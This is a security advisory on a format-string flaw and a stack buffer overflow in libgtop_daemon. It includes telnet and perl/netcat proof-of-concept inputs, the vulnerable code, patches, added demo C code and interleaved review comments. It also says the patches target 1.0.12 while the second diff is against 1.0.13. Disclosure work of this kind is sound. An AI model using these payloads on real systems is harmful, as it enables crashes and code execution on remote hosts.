The Laboratory intexxia found a remotely exploitable format string vulnerability in libgtop_daemon that could lead to privilege escalation on a remote system. In addition, Flavio Veloso discovered a buffer overflow in the same daemon that allows execution of arbitrary code.
Credit:
The information has been provided by Benoît Roussel and Flavio Veloso.
Vulnerable systems:
libgtop_daemon versions up to and including 1.0.12 (the patches below are against 1.0.12)
Immune systems:
libgtop_daemon versions 1.0.13 and up
libgtop_daemon is a GNOME daemon used to monitor the processes running on a remote system.
Format string:
A remote format string vulnerability exists in this daemon. The two functions syslog_message() and syslog_io_message() first format their arguments into a local buffer and then pass that buffer to syslog() as its format string. Because the buffer can contain data supplied by the client, the client ends up controlling a format string that syslog() interprets.
By sending a specially crafted string to the server, a remote attacker can read stack contents (%p, %x) or write to memory (%n) and thereby execute arbitrary code with the daemon's permissions. This vulnerability could cause privilege escalation.
The permitted() function, which checks whether a connecting client is authorised, is the affected code path: it logs client-supplied data through these two functions (the "Invalid authentication protocol" message in the proof of concept below).
libgtop_daemon is launched with 'nobody' permissions by default, so complete exploitation of this vulnerability gives an attacker code execution as 'nobody'. That foothold can still be used to compromise the local system by exploiting other local vulnerabilities.
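The bug class described above, as an added example that is not libgtop code: a variadic sink() with the same shape as the daemon's syslog_message() formats into a caller buffer instead of the system log, so it runs offline. log_unsafe() mirrors the unpatched call (client text used as the format), log_safe() the patched one (fixed "%s" format). count_directives() is a small check a practitioner can put in front of any logging sink to spot data that would be dangerous as a format; the function names and the sample client strings are assumptions for this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for syslog(): formats into a caller buffer instead of the system log.
 * Same shape as the daemon's syslog_message(): a format string plus varargs. */
static void sink(char *out, size_t outlen, const char *format, ...)
{
    va_list ap;
    va_start(ap, format);
    vsnprintf(out, outlen, format, ap);
    va_end(ap);
}

/* Unpatched shape: text that already contains client data is handed to the sink
 * as its format, so any '%' sequence in it is interpreted. Returns bytes written. */
int log_unsafe(char *out, size_t outlen, const char *client_text)
{
    sink(out, outlen, client_text);
    return (int)strlen(out);
}

/* Patched shape: a fixed "%s" format; client text only ever travels as an argument. */
int log_safe(char *out, size_t outlen, const char *client_text)
{
    sink(out, outlen, "%s", client_text);
    return (int)strlen(out);
}

/* Counts conversion directives in data that should be opaque ("%%" is a literal
 * percent and does not count). Anything other than 0 means the string must never
 * reach a *printf or syslog() call as the format argument. */
int count_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* escaped percent: skip both characters */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    char out[128];
    const char *client = "%p%p from client";          /* constructed client input */

    log_safe(out, sizeof out, client);
    printf("safe:   %s (%d directives in input)\n", out, count_directives(client));

    /* Only a benign input is fed to the unsafe path here: with "%p" the sink would
     * read arguments that were never passed, which is what crashes the daemon. */
    log_unsafe(out, sizeof out, "done 100%% ok");
    printf("unsafe: %s\n", out);
    return 0;
}
```

Compiling the real daemon with its logging functions annotated as `__attribute__((format(printf, 2, 3)))` would make the compiler flag the log_unsafe() pattern at the call site; the fix itself is always the same: a literal format and the untrusted text as an argument.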
Exploit:
Here is a proof of concept that shows where the problem occurs:
Client side:
~ % telnet 127.0.0.1 42800
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
%p%p
Connection closed by foreign host.
~ % telnet 127.0.0.1 42800
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
%n%n
Connection closed by foreign host.
Server side:
~/# libgtop_daemon -f
' from clientn[3877]: Invalid authentication protocol
'0xbffff46c0x804b2ae
libgtop-daemon[3877]: Refused connection from 127.0.0.1.
Segmentation fault
Patch:
diff -dru libgtop-1.0.12/src/daemon/gnuserv.c
libgtop-1.0.12-patched/src/daemon/gnuserv.c
--- libgtop-1.0.12/src/daemon/gnuserv.c Mon Nov 26 13:48:14 2001
+++ libgtop-1.0.12-patched/src/daemon/gnuserv.c Mon Nov 26 13:49:26 2001
@@ -93,7 +93,7 @@
vsnprintf (buffer, BUFSIZ-1, format, ap);
va_end (ap);
- syslog (priority, buffer);
+ syslog (priority, "%s", buffer);
}
void
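Review bot: the "%s" fix closes the syslog() sink, but the `format` parameter of syslog_message() itself (`vsnprintf (buffer, BUFSIZ-1, format, ap);`) is still a variadic format string, so any caller that passes client-derived text as `format` rather than as an argument stays exploitable. Suggest declaring syslog_message() and syslog_io_message() with the printf format attribute (`__attribute__((format(printf, 2, 3)))`) so the compiler flags non-literal formats at call sites, and auditing the existing callers for that pattern.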
@@ -108,7 +108,7 @@
va_end (ap);
snprintf (buffer2, BUFSIZ-1, "%s: %s", buffer, strerror (errno));
- syslog (priority, buffer2);
+ syslog (priority, "%s", buffer2);
}
/*
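Review bot: `strerror (errno)` in `snprintf (buffer2, BUFSIZ-1, "%s: %s", buffer, strerror (errno));` is evaluated after the vsnprintf()/va_end() calls that precede it, and those calls may modify errno, so the error text logged can belong to the wrong failure. Save errno into a local at the top of the function and pass that to strerror(). The "%s" change itself is correct and matches the first hunk.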
Buffer overflow:
When Flavio Veloso investigated this issue, he noticed another serious hole in the daemon: a stack buffer overflow in the same permitted() function, which may allow the client to execute code on the server. The length of the authentication data is read from the client and then used, without any range check, as the number of bytes to read into a 1024-byte stack buffer. Here is the code:
permitted (u_long host_addr, int fd)
{
    (...)
    char buf[1024];
    int auth_data_len;
    (...)
    /* first read: a 10-byte, client-supplied length field */
    if (timed_read (fd, buf, 10, AUTH_TIMEOUT, 1) <= 0)
        return FALSE;
    auth_data_len = atoi (buf);   /* whatever atoi() returns is trusted as-is */
    /* second read: auth_data_len bytes into the 1024-byte buf, overflowing it when > 1024 */
    if (timed_read (fd, buf, auth_data_len, AUTH_TIMEOUT, 0) != auth_data_len)
        return FALSE;
Example:
Here you can see the bug in action; the one-liner sends a length field of 2000 followed by 2000 bytes, nearly twice the size of the 1024-byte buffer:
$ perl -e 'print "MAGIC-1\0\0\0\0\0\0\0\0". "2000\0\0\0\0\0\0". ("A"x2000)' | nc localhost 42800
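The length-prefixed read from permitted(), replayed in memory as an added example (not libgtop code): a constructed byte stream stands in for the socket and timed_read(), unpatched_would_overflow() is an oracle for what the unpatched atoi() logic would do with a given length field, and read_auth_hardened() applies the bounds check the 1.0.13 patch adds, using strtol() with an end-pointer check instead of atoi(). build_stream() produces the same layout the perl one-liner sends from the length field onwards; whatever precedes the length field in the real protocol is left out, and all names here are assumptions for this example.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define AUTH_BUF  1024   /* char buf[1024] in permitted() */
#define LEN_FIELD 10     /* the first timed_read() fetches 10 bytes */

/* Constructed client stream standing in for the socket fd. */
struct stream { const unsigned char *data; size_t len, pos; };

/* Stand-in for timed_read(): copies up to n bytes, returns how many were available. */
static int stream_read(struct stream *s, void *dst, size_t n)
{
    size_t avail = s->len - s->pos;
    if (n > avail)
        n = avail;
    memcpy(dst, s->data + s->pos, n);
    s->pos += n;
    return (int)n;
}

/* Oracle for the unpatched logic: atoi() on the raw length field decides how many
 * bytes the second read writes into buf[AUTH_BUF]. Returns 1 if that exceeds it. */
int unpatched_would_overflow(const char lenfield[LEN_FIELD])
{
    char tmp[LEN_FIELD + 1];
    memcpy(tmp, lenfield, LEN_FIELD);
    tmp[LEN_FIELD] = '\0';            /* the daemon's buf has no such guarantee */
    int auth_data_len = atoi(tmp);
    return auth_data_len > AUTH_BUF;
}

/* Hardened read: parse the length strictly and reject anything outside 1..bufsz
 * before the second read, as the 1.0.13 patch does. Returns bytes read, -1 on refusal. */
int read_auth_hardened(struct stream *s, unsigned char *buf, size_t bufsz)
{
    char lenfield[LEN_FIELD + 1];
    if (stream_read(s, lenfield, LEN_FIELD) <= 0)
        return -1;
    lenfield[LEN_FIELD] = '\0';          /* extra hardening: terminate before parsing */

    errno = 0;
    char *end;
    long n = strtol(lenfield, &end, 10);
    if (errno != 0 || end == lenfield)   /* out of range, or no digits at all */
        return -1;
    if (n < 1 || (unsigned long)n > bufsz)   /* the bound the patch adds */
        return -1;

    if (stream_read(s, buf, (size_t)n) != (int)n)
        return -1;
    return (int)n;
}

/* Builds the wire bytes from the length field onwards: a NUL-padded 10-byte
 * length field followed by `fill` bytes of 'A', like the perl one-liner above. */
size_t build_stream(unsigned char *out, size_t outsz, const char *lenfield_text, size_t fill)
{
    size_t tl = strlen(lenfield_text);
    if (tl > LEN_FIELD)
        tl = LEN_FIELD;
    if (LEN_FIELD + fill > outsz)
        return 0;
    memset(out, 0, LEN_FIELD);
    memcpy(out, lenfield_text, tl);
    memset(out + LEN_FIELD, 'A', fill);
    return LEN_FIELD + fill;
}

int main(void)
{
    unsigned char wire[4096], buf[AUTH_BUF];
    size_t len = build_stream(wire, sizeof wire, "2000", 2000);   /* constructed attack input */
    struct stream s = { wire, len, 0 };

    printf("unpatched would overflow: %d\n", unpatched_would_overflow((const char *)wire));
    printf("hardened result: %d\n", read_auth_hardened(&s, buf, sizeof buf));
    return 0;
}
```

The oracle returns 1 for the page's "2000" payload and the hardened reader refuses it before the second read; a length of exactly 1024 is accepted by both the patch's `> sizeof(buf)` test and this code, so if the authentication data were ever treated as a C string the bound would need to be `>=`.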
Patch:
diff -Nru libgtop-1.0.13.orig/src/daemon/gnuserv.c libgtop-1.0.13/src/daemon/gnuserv.c
--- libgtop-1.0.13.orig/src/daemon/gnuserv.c Mon Nov 26 20:37:59 2001
+++ libgtop-1.0.13/src/daemon/gnuserv.c Tue Nov 27 09:16:16 2001
@@ -200,6 +200,12 @@
auth_data_len = atoi (buf);
+ if (auth_data_len < 1 || auth_data_len > sizeof(buf)) {
+ syslog_message(LOG_WARNING,
+ "Invalid data length supplied by client");
+ return FALSE;
+ }
+
if (timed_read (fd, buf, auth_data_len, AUTH_TIMEOUT, 0) != auth_data_len)
return FALSE;
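Review bot: `auth_data_len > sizeof(buf)` compares a signed int with a size_t; it is safe only because `auth_data_len < 1` rejects negative values first, so it draws -Wsign-compare warnings and silently breaks if the two tests are ever reordered; cast or compare against `(int) sizeof(buf)`. The bound also admits exactly sizeof(buf) bytes, which fills buf with no room for a terminator, so if the authentication data is later handled as a C string this is an off-by-one and `>=` is the safer test. `auth_data_len = atoi (buf);` remains unchecked: a non-numeric field now yields 0 and is caught by `< 1`, but a field such as "12abc" parses as 12 without complaint; strtol() with an end-pointer check would reject it.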
Official solution (for both):
libgtop 1.0.13 was released to correct both issues. It can be downloaded from:
ftp://ftp.gnome.org/pub/GNOME/stable/sources/libgtop/libgtop-1.0.13.tar.gz